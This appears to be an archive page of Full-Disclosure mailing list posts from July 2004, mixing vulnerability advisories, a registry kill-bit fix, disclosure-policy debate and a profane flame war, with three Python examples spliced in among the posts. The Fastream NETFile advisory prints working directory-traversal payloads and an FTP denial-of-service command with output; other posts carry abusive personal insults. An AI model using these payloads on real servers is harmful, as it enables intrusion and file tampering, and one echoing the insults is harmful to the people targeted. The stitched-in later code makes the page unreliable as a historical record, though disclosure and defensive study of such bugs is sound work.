_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] oracle 10g installer race condition
From: Knud Erik Højgaard (kain@ircop.dk)
Date: Sat Jul 03 2004 - 18:06:54 CDT
http://kokanins.homepage.dk/or0rcle.txt
Unbreakable oracle people not informed, this bug is stupid and next to
useless, hence the disclosure. One can only wonder what the coders are
thinking when they chmod 777 stuff.
--
kokanin
[Full-Disclosure] RE: Registry Fix For Variant of Scob
From: Thor Larholm (thor@pivx.com)
Date: Sat Jul 03 2004 - 17:47:30 CDT
Setting the kill bit on the "Shell.Application" ActiveX object, or any
other ActiveX, is a system wide configuration change. This is also the
reason for the incompatibility issues you are mentioning, but there is
no reason to kill the bird to secure the nest.
The problem here is not the ADODB.Stream or Shell.Application objects,
the problem is the insecure My Computer zone in Internet Explorer. Your
registry fix will have adverse functionality regressions on any Windows
administrator that uses WSH, when there is no reason for this. ActiveX
objects are used in many hosts of which IE is just one; others include
JScript, VBScript, HTML Applications and WSH, all of which run outside
of the browser and require executional privileges to launch in the first
place.
The prerequisite for even having privileges enough to launch the
Shell.Application ActiveX object inside IE is to have script running in
the My Computer zone. Locking down this zone will completely prevent
this exploit, without introducing functionality regressions in other
parts of Windows. In fact, if you had implemented the registry changes I
described back in early September 2003 you would have been safe against
all the command execution vulnerabilities that have subsequently been
discovered - including ADODB.Stream and Shell.Application, which are
themselves just minor components of a larger exploit prerequisite.
http://www.securityfocus.com/archive/1/346174/2003-11-30/2003-12-06/0
I am sure that tomorrow, next week and next month we will find even more
ways to exploit insecure zone privileges in IE. You can either try to
fix the root cause once or you can try to treat each new symptom as it
is discovered.
There is no need to hurriedly introduce last-minute system-wide
functionality regressions such as killbitting Shell.Application; all you
need to do is lock down the My Computer zone in IE properly. We
implemented this in Qwik-Fix last September and have since then not had
to worry about exploits that target these design principles in IE.
Instead, we have been able to focus our efforts on securing other parts
of Windows as opposed to scrambling to cope with each new exploit from
jelmer or http-equiv. You can get a free copy of Qwik-Fix Pro at
http://qwik-fix.net
All software is inherently insecure, the difference is in how you treat
that insecurity.
Regards
Thor Larholm
Senior Security Researcher
PivX Solutions
24 Corporate Plaza #180
Newport Beach, CA 92660
http://www.pivx.com
thor@pivx.com
Stock symbol: (PIVX)
Phone: +1 (949) 231-8496
PGP: 0x5A276569
6BB1 B77F CB62 0D3D 5A82 C65D E1A4 157C 5A27 6569
PivX defines a new genre in Desktop Security: Proactive Threat
Mitigation.
<http://www.pivx.com/qwikfix>
-----Original Message-----
From: Drew Copley [mailto:dcopley@eEye.com]
Sent: Friday, July 02, 2004 2:33 PM
To: Windows NTBugtraq Mailing List; bugtraq@securityfocus.com
Subject: Registry Fix For Variant of Scob
About the same time Jelmer found the adodb bug, http-equiv found a
similar issue with the object "Shell.Application".
This issue has also been unfixed for the past ten months.
Unfortunately, Microsoft has not taken the "hint" and not
fixed this issue either.
Jelmer has noted this and made a proof of concept exploit
page here: http://62.131.86.111/security/idiots/malware2k/installer.htm
The below registry file will protect you from this exploit
by kill biting "Shell.Application" variant.
<------------------------------------------->
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{13709620-C279-11CE-A49E-444553540000}]
"Compatibility Flags"=dword:00000400
<-------------------------------------------->
I will be updating our free fix download here:
http://www.eeye.com/html/research/alerts/AL20040610.html
This will break some hta scripts that might be used
for management. It may cause some incompatibility issues
with some programs.
Shell.Application is commonly used by administrators
for administration of systems via Visual basic script
or WSH. It may have other uses. It is kind of Microsoft's answer to
shell script -- though not as happy as batch.
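An added Python helper, not code from either post, eEye or PivX: it parses a .reg export of the "ActiveX Compatibility" key in the format quoted above and reports which CLSIDs carry the kill bit (bit 0x400 of "Compatibility Flags"), so an administrator can audit what a kill-bit fix actually set. The sample input is the Shell.Application entry from the post plus a constructed all-zero placeholder CLSID with flags of 0.

```python
import re

# The kill bit is bit 0x400 of the per-CLSID "Compatibility Flags" DWORD.
KILL_BIT = 0x400
SHELL_APPLICATION_CLSID = "{13709620-C279-11CE-A49E-444553540000}"

# Constructed sample: the .reg text from the post, plus a second entry with a
# placeholder CLSID and flags of 0 so both outcomes show up in the report.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{13709620-C279-11CE-A49E-444553540000}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000000-0000-0000-0000-000000000000}]
"Compatibility Flags"=dword:00000000
"""

KEY_RE = re.compile(r"^\[(?P<path>[^\]]+)\]$")
DWORD_RE = re.compile(r'^"(?P<name>[^"]+)"=dword:(?P<hex>[0-9A-Fa-f]{1,8})$')
CLSID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$")


def parse_compat_flags(reg_text):
    """Map CLSID -> Compatibility Flags for every 'ActiveX Compatibility'
    key in a .reg export. Keys under other paths are ignored."""
    flags = {}
    current = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        key = KEY_RE.match(line)
        if key:
            current = None
            path = key.group("path")
            if "\\ActiveX Compatibility\\" in path:
                clsid = CLSID_RE.search(path)
                if clsid:
                    current = clsid.group(0).upper()
            continue
        val = DWORD_RE.match(line)
        if val and current and val.group("name") == "Compatibility Flags":
            flags[current] = int(val.group("hex"), 16)
    return flags


def kill_bit_set(flags, clsid):
    """True if the control identified by clsid is kill-bitted (bit 0x400 set)."""
    return bool(flags.get(clsid.upper(), 0) & KILL_BIT)


def killbitted_controls(reg_text):
    """Sorted CLSIDs whose kill bit is set; a quick audit of an export."""
    flags = parse_compat_flags(reg_text)
    return sorted(c for c, f in flags.items() if f & KILL_BIT)


if __name__ == "__main__":
    print(killbitted_controls(SAMPLE_REG))
```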
[Full-Disclosure] Linux Virtual Server/Secure Context procfs shared permissions flaw
From: Veit Wahlich (cru@zodia.de)
Date: Sat Jul 03 2004 - 21:33:52 CDT
Linux Virtual Server/Secure Context procfs shared permissions flaw
==================================================================
2004-07-02, Veit Wahlich <cru@zodia.de>
Official location of this document: http://ircnet.de/article.shtml?vsproc
Product|
-------+
Linux Virtual Server extends the Linux kernel to provide the ability to
run several virtual servers on a single host system. In contrast to
other virtualization attempts Linux Virtual Server uses a split-
userland architecture under a single kernel to optimize sharing of all
resources and reduce resource consumption overhead per VM to the
absolute minimum.
http://www.linux-vserver.org/
Synopsis|
--------+
During a security audit on the vproc security scheme a permission-
sharing vulnerability was discovered.
Vulnerable|
----------+
<= 1.27 (Linux 2.4 stable branch)
<= 1.3.9 (Linux 2.4 devel branch)
<= 1.9.1 (Linux 2.6 devel branch)
Severity|
--------+
- local DoS
- creation of information leaks
See details below.
History|
-------+
2004-06-30 vuln discovered
2004-07-02 vendor informed
2004-07-03 first vendor response, confirmation
2004-07-04 official fix available, advisory release
Description|
-----------+
While auditing and experimenting with VServer procfs and vproc security
we discovered a problem sharing permissions on the procfs mounted
directories:
Within any context users are still able to change permissions on /proc,
both access permission and ownership. That is just fine as many people
would like to restrict access to /proc to the root user or a group of
trusted users.
But as changes to a procfs mountpoint do not apply to the mountpoint
itself but to procfs in general, these changes affect all contexts
(VServers) and even the host system.
All tests were done against the stable branch (1.2x) but according to
Herbert Poetzl, the problem exists on both devel branches (1.3.x,
1.9.x), too.
Version 1.28 (stable branch) resolves this problem.
Exploitation|
------------+
The vulnerability may be locally exploited in two ways:
1. From within a virtual server a denial of service attack (DoS) may be
provoked towards other virtual servers and the host system.
Setting permissions that prevent users other than root from reading
information from procfs (i.e. process information) will disable a wide
range of services.
2. On systems where access to procfs is allowed to root only (or to a
group of trusted users; i.e. shared hosting environments), an attacker
may use access to another virtual server to gain critical information
about processes or other data on the primary target virtual server (or
the host system).
Work-around|
-----------+
To work around this problem, procfs may be mounted read-only. On the
host-system do:
# mount -o remount,ro /proc
As this also prevents the host system from changing any values in
/proc, this should just be a temporary solution!
[Full-Disclosure] [ADVISORY] Fastream NETFile FTP/Web Server
From: aT4r ins4n3 (at4r@ciberdreams.com)
Date: Sun Jul 04 2004 - 08:34:00 CDT
Fastream NETFile FTP/Web Server Input validation Errors
--------------------------------------------------------
Release Date: 4 July 2004
Severity: High
Systems Affected: Fastream NETFile FTP/Web Server <=v.6.7.2.1085
Systems Not Affected: Fastream NETFile FTP/Web Server v6.7.3
Vendor URL: http://www.fastream.com/netfileserver.htm
Original Advisory: http://www.haxorcitos.com/Fastream_advisory.txt
Author: Andres Tarasco Acuña
email: at4r@haxorcitos.com
WEB: www.haxorcitos.com
------------------
1. Description
------------------
Vendor's Description:
"Fastream NETFile Server is a secure FTP server and Web server combined
together in one application. Our claim is that it is the easiest to
setup and use server on the Internet!"
"Fastream NETFile FTP Server is a multi-threaded FTP server with virtual
links, quotas, U/D ratio and extremely fast directory and file caches.
Besides being a fast FTP server with full user and group based
permissions and file and directory cache, NETFile Server is also a Web
server that is developed for sharing files. Fastream NETFile Web Server
is a web server with full HTTP 1.1 compatibility with support for
multi-part downloads and keep-alive connections."
-------------------
2. Vulnerability
-------------------
There are some input validation errors in Fastream Netfile that allow
users to bypass the root directory restrictions.
Due to the fact that Fastream Netfile allows remote users to
upload/create/delete files in the application directory, it's easy to
exploit this vulnerability and compromise the system.
Another vulnerability was reported, in the way that Netfile handles some
URLs. After requesting a specially crafted directory it's possible to
cause a 1 minute Denial of Service.
-------------------
3. Exploit code
-------------------
The problem is in the way that Netfile handles two slashes.
Example URL:
http://HOST:PORT/?command=mkdir&filename=..//FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY
C:\>dir FOLDE*
Volume in drive C is W2000P
Volume Serial Number is xxxx-xxxx
Directory of C:\
07/03/2004 07:47p <DIR> FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY
0 File(s) 0 bytes
1 Dir(s) 119,015,936 bytes free
Netfile allows some other methods in the "command" parameter, that could
be used to create/delete folders/files outside the root directory.
To exploit the upload files vulnerability we need to take a look at the
data sent in the POST request:
-----------------------------7d42c98700ea
Content-Disposition: form-data; name="upfile"; filename="D:\foo.txt"
Content-Type: text/plain
THIS IS AN EXAMPLE
-----------------------------7d42c98700ea--
It's possible for an attacker to modify the filename parameter to
something like:
Filename="//..//autorun.inf" and place malicious files in the system, or
overwrite existing files.
Seems that the FTP Server is not vulnerable to this issue and directory
traversal attacks are not possible, but there is another bug that allows
malicious users to cause a denial of service by executing the following
command:
D:\>ftp localhost
Connected to at4r.intranet.
220 Fastream NETFile FTP Server Ready
User (at4r.intranet:(none)): ftp
331 Password required for ftp.
Password:
230 User ftp logged in.
ftp> cd /////A <-- here the ftp server hangs for a lot of time
599 No such directory.
ftp>
-----------------
4. Solution:
-----------------
The best solution is to upgrade the software to version 6.7.3 that was
released by the vendor on 3 July 2004.
Another way to minimize the impact of this vulnerability is to store the
root directory of Fastream Netfile server on another partition and remove
create/delete file and directory permissions from all users, including
Guest accounts.
-------------------
5. Timeline
-------------------
DISCLOSURE TIMELINE:
-3 July, 2004: Vendor Contacted.
-3 July, 2004: Issue Fixed after 2 hours. New release 6.7.3 available
-4 July, 2004: Public Disclosure
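An added example, not Fastream's code nor the advisory author's: a hypothetical prefix-only root check (the advisory does not show NETFile's actual filter, so this one is a constructed stand-in for the bug class) beside a canonicalise-then-contain check, both run on the advisory's mkdir and multipart upload payloads. The document root is a constructed placeholder path.

```python
import posixpath
from urllib.parse import urlsplit, parse_qs

# Constructed document root; the real server's root path is not in the advisory.
ROOT = "/srv/netfile/root"


def weak_prefix_check(root, user_path):
    """Hypothetical weak check: glue the raw name onto the root and accept the
    result if it still starts with the root. Nothing normalises '..' or '//',
    so a name such as '..//FOLDER' is accepted even though the filesystem will
    resolve it one level above the root."""
    joined = root + "/" + user_path
    return joined if joined.startswith(root + "/") else None


def safe_join(root, user_path):
    """Hardened check: normalise first, then verify containment.
    Returns the resolved path, or None when it would leave the root."""
    cleaned = user_path.replace("\\", "/")   # treat backslashes as separators too
    cleaned = cleaned.lstrip("/")            # never honour an absolute client path
    # normpath collapses repeated slashes and resolves '..' lexically
    candidate = posixpath.normpath(posixpath.join(root, cleaned))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


def upload_target(root, client_filename):
    """Multipart uploads: the client-supplied filename is only ever a basename.
    'D:\\foo.txt' and '//..//autorun.inf' both land inside the root."""
    base = posixpath.basename(client_filename.replace("\\", "/"))
    if base in ("", ".", ".."):
        return None
    return posixpath.join(root, base)


def check_mkdir_url(root, url):
    """Apply safe_join to the 'filename' parameter of a ?command=mkdir request."""
    params = parse_qs(urlsplit(url).query)
    if params.get("command") != ["mkdir"]:
        return None
    return safe_join(root, params.get("filename", [""])[0])


if __name__ == "__main__":
    payload = "..//FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY"
    print("weak    :", weak_prefix_check(ROOT, payload))
    print("hardened:", safe_join(ROOT, payload))
```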
Re: [Full-Disclosure] VERY HIGH VULNERABILITY DISCLOSURE !!! MASS ROOT POSSIBLE !!! PLEASE BE ATTENTIVE !!!
From: nicolas vigier (boklm@mars-attacks.org)
Date: Sun Jul 04 2004 - 08:32:15 CDT
On Sat, 03 Jul 2004, Frog M@n wrote:
> WE ARE LOOKING FOR A JOB IN THE SECURITY RESEARCH
Thanks, that was funny.
Re: [Full-Disclosure] IE Web Browser: "Sitting Duck"
From: bills.bitch@hushmail.com
Date: Sat Jul 03 2004 - 15:45:13 CDT
ha ha ha ha ha the dog bites his master he he he he
Couple of things
Judge: What is this Internet Explorer thing Gates?
Bill Gates: It's a core component of the operating system ma'am
Judge: BULLSHIT GATES! JOE SAYS IT ISN'T
Judge: YOU'RE GUILTY!
Bill Gates: oh
JUDGE: 6 POSSIBLE SENTENCES, JAIL, FINE, FIX, REPENT, SUSPEND, GO TO
JOE SCHOOL OF REHABILITATION
joe: you see you see, the judge has given him six options, that means
he's not guilty, do you see what I mean. Can you see it can you see it.
By the way did I tell you about my last gig, I made a whack of dough
off it and now I am sitting on the beach in Tahiti sucking back margaritas.
*sigh* I wish I were Bill Gates, he'd be so cool
RE: [Full-Disclosure] The "Drew Copley is a prick" Poll update [Time to Grow Up]
From: Bugtraq Security Systems (research@bugtraq.org)
Date: Sun Jul 04 2004 - 10:26:17 CDT
Hi Thomas!
Nice! We're glad to see all those lonely nights watching Matlock were time
well spent. The fact that you'd even consider legal action over being
called a prick tells us a lot. So let us go out on a limb here and state
that you too are indeed a fucking prick. There. We said it. Is that the
very fabric of society we hear crumbling right there?
Thomas. You're a moron. And you know it. Deep down you realise you lack
what it takes in every aspect of your professional life. That's why you
keep on buying into those self motivational courses that tell you to
"approach business with the sunny side up!" and make you get colonics to
align your chakra. You're a fraud and an imposter, and you have no place
in security. Is it our place to inform you of these facts? Fuck yes it
is.
We're sick of the likes of you and the army of pedantic clueless pricks
you represent. The sooner you go back to designing websites for your
next of kin, the better.
Have a great weekend and leave "Making the Inetrnet(sic) a Secure Place of
Business" to someone with half a clue. You dyslexic fuck.
Love,
Team Bugtraq Security
On Sun, 4 Jul 2004, Thomas Ryan wrote:
> The lack of professionalism from Team Bugtraq Security is getting to be
> annoying, openly showing their ignorance with defamatory remarks towards
> Drew Copley and eEye. It's quite obvious you don't have a complete
> understanding of the law, otherwise you would realize that you can be sued
> for deformation of character and slander. Dummying your information in
> Dotster (Your Registrar) and hiding behind ziplip.com won't do you any good.
> Have you heard of a subpoena?
>
> IF you have nothing constructive to say, then please don't waste everyone's
> bandwidth, packets, hard drive space or our energy to delete your emails!
>
> Have a great weekend everyone!
>
> Thomas Ryan
> Provide Security
>
> -----Original Message-----
> From: full-disclosure-admin@lists.netsys.com
> [mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of Bugtraq
> Security Systems
> Sent: Thursday, July 01, 2004 16:55
> To: full-disclosure@lists.netsys.com
> Subject: [Full-Disclosure] The "Drew Copley is a prick" Poll update
>
> Hi list!
>
> Due to overwhelming response we request that you direct your submissions
> for the official Bugtraq Security "Drew Copley is a fucking prick" poll to
> drewpoll@bugtraq.org. We'd also like to note that all submissions are
> treated as strictly confidential and that our resident longhaired hippie
> is more than willing to take any beatings in Vegas in your name, as he'll be
> announcing the results during eEye's blackhat speech.
>
> Thank you,
> Team Bugtraq Security
>
[Full-Disclosure] The "Drew Copley is a prick" Poll update (vote++)
From: Boggles (boggles@hush.com)
Date: Sun Jul 04 2004 - 10:19:12 CDT
Hi Tom, Happy 4th July.
>The lack of professionalism from Team Bugtraq Security is getting to be
>annoying,
We'll start there.
we do love the summer holidays, each year more pre-pubescents emerge,
watch the various uber films (Shrek for example) and post to this list.
As we are questioning professionalism of Bugtraq why don't we play the
"pot kettle black" game.
and we quote:
"Provide Security - Making the Inetrnet a Secure Place of Business"
If you can't spot the problem there maybe you shouldn't have started
your holiday so soon.
Next, as a professional "Tom", why is it that you're wasting company resources
by posting to this list (more on this later.)
>openly showing their ignorance with defamatory remarks
Ignorance, oh ok. Yes CSS is a new attack isn't it.
>towards
>Drew Copley and eEye. It's quite obvious you don't have a complete
>understanding of the law, otherwise you would realize that you can be
With your "complete understanding" (inferred from above), could you please
tell us about the current legal status of Turkey and Gerbil weddings
in California?
>for deformation of character and slander.
Oh goodie, he's one of them. What is it? Can't make money with "consultancy"
so sue your way to the top?
>Dummying your information in
>Dotster (Your Registrar) and hiding behind ziplip.com won't do you any
>good.
we sense Bugtraq panicking... no really. we do. serious.
see, Boggles can be 3l1T3 like Tom and use whois. But Boggles much more
3l1t3 by giving MAP (*gasp*)!
There is no company return (yet)
we are sure with as much legal action as you can afford,
that there will be a good company return yet to come.
oh, Mr legal Guru (makes a change from a "Security BASICS" Guru doesn't
it) why dost thou asketh questions such as:
And:
"
Subject: HIPAA Standards
Where can I find information on the current HIPAA Security Standards?
Thanks!
Tom
"
doesn't your complete understanding of the law mean you should be MAKING
THE LAWS?
>Have you heard of a subpoena?
Passive version of a poena?
>IF you have nothing constructive to say,
Follow Tom's lead and email full-disclosure.
- --
Mr Security Industry say:
"Please gimme 0day, I need to make a living".
"huh? you use packetstorm too?!?"
[o-o]
__|__
_( )_
[Full-Disclosure] Re:Bugtraq Security Systems
From: bitlance winter (bitlance_3@hotmail.com)
Date: Sun Jul 04 2004 - 12:36:50 CDT
Who are YOU, Bugtraq Security Systems?
Are YOU foo,bar.foobar?
;)
YOU say LOVE, OK.
[blockquote]
"With burning brain and heart of hate,
I sought my wronger, early, late,
And all the wretched night and day
My dream and thought was slay, and slay.
My better self rose uppermost,
The beast within my bosom lost
Itself in love; peace from afar
Shone o'er me radiant like a star.
I Slew my wronger with a deed,
A deed of love; I made him bleed
With kindness, and I filled for years
His soul with tenderness and tears."
Let those who aim at the right life, who believe that they love Truth, cease
to passionately oppose themselves to others, and let them strive to calmly
and wisely understand them, and in thus acting toward others they will be
conquering themselves; and while sympathizing with others, their own souls
will be fed with the heavenly dews of kindness, and their hearts be
strengthened and refreshed in the Pleasant Pastures of Peace.
[/blockquote]
Best Regards.
--
bitlance winter.
Re: [Full-Disclosure] Public Review of OIS Security Vulnerability Reporting and Response Guidelines
From: dave (dave@immunitysec.com)
Date: Sun Jul 04 2004 - 12:18:35 CDT
Nobody trusts the OIS or its motives. I imagine this is similar to the
feedback you've gotten from everyone else as well, but Immunity has no
plans to subscribe to your guidelines, and is going to oppose any
efforts you make to legislate those guidelines as law. In section 1.1
the draft proposes that the purpose of the OIS's model is to protect
systems from vulnerabilities. This is fairly obviously untrue - the
purpose of the OIS is to lobby towards a business model for Microsoft
and the other OIS members that involves the removal of non-compliant
security researchers.
This call for feedback is a thinly disguised attempt to get public
legitimacy and allow the OIS to claim it has community backing, which it
clearly does not.
It's rare, but there are still security companies and individuals who do
not owe their entire business to money from Microsoft. It's July 4th,
and some of us are Americans who understand the concept of independence.
Dave Aitel
Immunity, Inc.
OIS wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> The Organization for Internet Safety (OIS) extends an invitation to
> the readers of the BugTraq, NTBugtraq, and Full-Disclosure mailing
> lists to participate in the ongoing public review of the OIS Security
> Vulnerability Reporting and Response Guidelines.
> The OIS reviews the Guidelines annually to ensure that they remain
> useful and relevant to the security community and, most importantly,
> to the millions of computer users who are the ultimate beneficiaries
> of effective computer security practices. Over the past year, OIS
> has received feedback from many adopters of the Guidelines as well as
> from several public-private partnerships, and have incorporated much
> of this feedback into an interim version that is available at
> http://www.oisafety.org/review/draft-1.5.pdf. We recommend reviewing
> the interim version, but reviewers are welcome to provide feedback on
> the original version at http://www.oisafety.org/reference/process.pdf
> if they would like.
>
> For more information on the public review, please visit
> http://www.oisafety.org/review-1.5.html. The closing date for the
> review has been extended until 16 July 2004. We look forward to your
> feedback.
>
> Regards,
>
> The Organization for Internet Safety
> www.oisafety.org
RE: [Full-Disclosure] The "Drew Copley is a prick" Poll update [Time to Grow Up]
From: Mortis (m0rtis@adelphia.net)
Date: Sun Jul 04 2004 - 13:17:07 CDT
I told you that would be more fun than fishing with dynamite.
Plenty of fresh worms for a hungry turkey.
Sort your mail box and go to town.
--
Libel-libel,
Dan eel
http://full-disclosure.50megs.com/
[Full-Disclosure] Gmail Information Disclosure Vulnerability
From: amforward@mailsurf.com
Date: Sun Jul 04 2004 - 14:10:44 CDT
Brief
--------------
While I was playing with Gmail, I found a bug that may disclose
information about the users currently attempting to register a new
Gmail account. This seems to be a vulnerability with low severity (at
least until now).
CheckAvailability Script
--------------
In the registration page, the "Check Availability" button queries a
certain script, namely /accounts/CheckAvailability. The script takes
the desired username, and checks if it is available. If it is not
available, it suggests other usernames by concatenating, for example,
your last name to it.
The Problem
--------------
There seems to be a thread-safety problem with the CheckAvailability
script. When the script is under heavy stress, it may return answers
to queries that are not yours, revealing others' desired usernames,
and first and last names (see attached screen shot).
Reproduction
--------------
To reproduce it, you should:
a. Have a valid Gmail invitation
AND
b. Frequently invoke CheckAvailability by
   1. Creating a tool that automates the script invocation.
   OR
   2. Having the patience to keep clicking the button frequently (this
      works too!).
I have not yet carefully studied the script, but I think it might not
be a problem with this script only, but others as well. Your thoughts
are appreciated.
Regards,
Ahmed Motaz
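The bug class described above, as an added example that is not Gmail's code nor the poster's: a checker that keeps the request being served in state shared by all worker threads, beside one that keeps it request-local. A barrier forces the interleaving so the cross-talk is reproducible; the taken names, requesters and the "append the last name" suggestion rule are constructed from the post's description.

```python
import threading

# Constructed data: names already registered, and two concurrent requests
# (requester -> (desired username, last name)).
TAKEN = {"john", "maria"}
REQUESTS = {"alice": ("john", "Lee"), "bob": ("maria", "Park")}


def suggest(username, last_name):
    """Suggestion rule from the post: append the last name to a taken name."""
    return f"{username}.{last_name.lower()}"


def reply_for(username, last_name):
    """The correct reply for one request, computed from that request alone."""
    if username in TAKEN:
        return {"available": False, "suggestion": suggest(username, last_name)}
    return {"available": True, "suggestion": None}


class SharedStateChecker:
    """Buggy pattern: the request being served lives in state shared by all
    worker threads, so a concurrent request can overwrite it mid-flight."""

    def __init__(self):
        self.username = None
        self.last_name = None

    def check(self, username, last_name, pause=None):
        self.username, self.last_name = username, last_name
        if pause:
            pause()                      # window in which another worker runs
        return reply_for(self.username, self.last_name)


class RequestLocalChecker:
    """Fixed pattern: every value stays in the request's own stack frame."""

    def check(self, username, last_name, pause=None):
        if pause:
            pause()
        return reply_for(username, last_name)


def race(checker_cls):
    """Serve REQUESTS through one checker with a forced interleaving: both
    workers store their input, meet at a barrier, then both compute.
    Returns {requester: reply}; the barrier makes the outcome repeatable."""
    checker = checker_cls()
    barrier = threading.Barrier(len(REQUESTS))
    results = {}

    def worker(who, username, last_name):
        results[who] = checker.check(username, last_name, pause=barrier.wait)

    threads = [threading.Thread(target=worker, args=(who, *req))
               for who, req in REQUESTS.items()]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results


def leaked(results):
    """Requesters whose reply was computed from someone else's data."""
    return sorted(who for who, reply in results.items()
                  if reply != reply_for(*REQUESTS[who]))


if __name__ == "__main__":
    print("shared state :", leaked(race(SharedStateChecker)))
    print("request-local:", leaked(race(RequestLocalChecker)))
```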
[Full-Disclosure] Re: Public Review of OIS Security Vulnerability Reporting and ResponseGuidelines
From: Fred Mobach (fred@mobach.nl)
Date: Sun Jul 04 2004 - 13:56:39 CDT
OIS wrote:
>
> The Organization for Internet Safety (OIS) extends an invitation to
> the readers of the BugTraq, NTBugtraq, and Full-Disclosure mailing
> lists to participate in the ongoing public review of the OIS Security
> Vulnerability Reporting and Response Guidelines.
I have problems with the OIS guidelines as I distrust at least one
member of OIS since it hasn't published verifiable information on Bugtraq
for some years. When I combine the policy of that company with the
next statement from OIS's about.html page
"Does OIS support pre-disclosure of vulnerability information to select
groups?
No. We believe the software author should be given a chance to create a
fix before vulnerability information is made public, but that there
should be no further distribution of that information until the fix is
complete. This principle can be very difficult to adhere to in certain
situations, such as dealing with the open source community where there
aren't protections to keep vulnerability information secret."
I am afraid that that company might take years to supply a fix or even
to never supply that. A limit of at most four weeks before disclosure
seems reasonable to me. If that company cannot live with that it can opt
to die.
Another interesting point for me is the statement about the open source
community in the same paragraph. Some organizations still have problems
with that community, which is reflected by adopters.html webpage of OIS.
No representation of the open source community as far as I can see. But
please correct me if I am wrong.
--
Fred Mobach - fred@mobach.nl - postmaster@mobach.nl
Systemhouse Mobach bv - The Netherlands - since 1976
website : http://fred.mobach.nl
Q: servos ad pileum vocare ?
A: servos fenestrae ad pileum rubrem vocare !
[Full-Disclosure] [ GLSA 200407-04 ] Pure-FTPd: Potential DoS when maximum connections is reached
From: Thierry Carrez (koon@gentoo.org)
Date: Sun Jul 04 2004 - 14:45:26 CDT
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200407-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Pure-FTPd: Potential DoS when maximum connections is reached
Date: July 04, 2004
Bugs: #54590
ID: 200407-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Pure-FTPd contains a bug potentially allowing a Denial of Service
attack when the maximum number of connections is reached.
Background
==========
Pure-FTPd is a fast, production-quality and standards-compliant FTP
server.
Affected packages
=================
-------------------------------------------------------------------
  # Package                 / Vulnerable  /                 Unaffected
-------------------------------------------------------------------
  1 net-ftp/pure-ftpd         <= 1.0.18                    >= 1.0.18-r1
Description
===========
Pure-FTPd contains a bug in the accept_client function handling the
setup of new connections.
Impact
======
When the maximum number of connections is reached an attacker could
exploit this vulnerability to perform a Denial of Service attack.
Workaround
==========
There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version.
Resolution
==========
All Pure-FTPd users should upgrade to the latest stable version:
# emerge sync
# emerge -pv ">=net-ftp/pure-ftpd-1.0.18-r1"
# emerge ">=net-ftp/pure-ftpd-1.0.18-r1"
References
==========
[ 1 ] Pure-FTPd website
http://www.pureftpd.org
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200407-04.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/1.0
[Full-Disclosure] [ GLSA 200407-03 ] Apache 2: Remote denial of service attack
From: Thierry Carrez (koon@gentoo.org)
Date: Sun Jul 04 2004 - 14:41:19 CDT
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200407-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Apache 2: Remote denial of service attack
Date: July 04, 2004
Bugs: #55441
ID: 200407-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
A bug in Apache may allow a remote attacker to perform a Denial of
Service attack. With certain configurations this could lead to a heap
based buffer overflow.
Background
==========
The Apache HTTP Server Project is an effort to develop and maintain an
open-source HTTP server for modern operating systems. The goal of this
project is to provide a secure, efficient and extensible server that
provides services in tune with the current HTTP standards.
Affected packages
=================
-------------------------------------------------------------------
  # Package                 / Vulnerable  /                 Unaffected
-------------------------------------------------------------------
  1 net-www/apache            <= 2.0.49-r3                 >= 2.0.49-r4
                                                           < 2
Description
===========
A bug in the protocol.c file handling header lines will cause Apache to
allocate memory for header lines starting with TAB or SPACE.
Impact
======
An attacker can exploit this vulnerability to perform a Denial of
Service attack by causing Apache to exhaust all memory. On 64 bit
systems with more than 4GB of virtual memory a possible integer
signedness error could lead to a buffer based overflow causing Apache
to crash and under some circumstances execute arbitrary code as the
user running Apache, usually "apache".
Workaround
==========
There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version.
Resolution
==========
Apache 2 users should upgrade to the latest version of Apache:
# emerge sync
# emerge -pv ">=net-www/apache-2.0.49-r4"
# emerge ">=net-www/apache-2.0.49-r4"
References
==========
[ 1 ] Georgi Guninski security advisory #70, 2004
http://www.guninski.com/httpd1.html
[ 2 ] CAN-2004-0493
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0493
Availability
============
This GLSA and any updates to it are available for viewing at
